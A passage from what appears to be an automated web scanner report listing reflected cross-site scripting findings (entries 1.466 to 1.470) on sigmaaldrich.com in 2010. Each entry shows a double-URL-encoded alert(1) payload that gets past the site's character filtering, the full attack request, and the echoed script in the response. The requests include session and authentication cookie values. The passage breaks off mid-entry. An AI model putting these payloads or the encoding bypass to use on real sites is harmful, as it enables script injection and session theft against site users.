Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images28ad3";alert(1)//6747eed535d/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.466. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e804b%2522%253balert%25281%2529%252f%252f1b669119b0f was submitted in the REST URL parameter 5. This input was echoed as e804b";alert(1)//1b669119b0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-cataloge804b%2522%253balert%25281%2529%252f%252f1b669119b0f/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-cataloge804b";alert(1)//1b669119b0f/new-icon","E404") ;
   </script>
...[SNIP]...

1.467. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffcec%2522%253balert%25281%2529%252f%252f2bd679ffa16 was submitted in the REST URL parameter 6. This input was echoed as ffcec";alert(1)//2bd679ffa16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalog/new-iconffcec%2522%253balert%25281%2529%252f%252f2bd679ffa16 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalog/new-iconffcec";alert(1)//2bd679ffa16","E404") ;
   </script>
...[SNIP]...

1.468. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da26%2522%253balert%25281%2529%252f%252f2b9b7bea53e was submitted in the REST URL parameter 1. This input was echoed as 5da26";alert(1)//2b9b7bea53e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc5da26%2522%253balert%25281%2529%252f%252f2b9b7bea53e/medialib/sigma-aldrich/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc5da26";alert(1)//2b9b7bea53e/medialib/sigma-aldrich/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.469. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 976e7%2522%253balert%25281%2529%252f%252f94d8812d8e3 was submitted in the REST URL parameter 2. This input was echoed as 976e7";alert(1)//94d8812d8e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib976e7%2522%253balert%25281%2529%252f%252f94d8812d8e3/sigma-aldrich/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib976e7";alert(1)//94d8812d8e3/sigma-aldrich/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.470. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dbc9%2522%253balert%25281%2529%252f%252f713ae4d73e was submitted in the REST URL parameter 3. This input was echoed as 6dbc9";alert(1)//713ae4d73e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich6dbc9%2522%253balert%25281%2529%252f%252f713ae4d73e/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
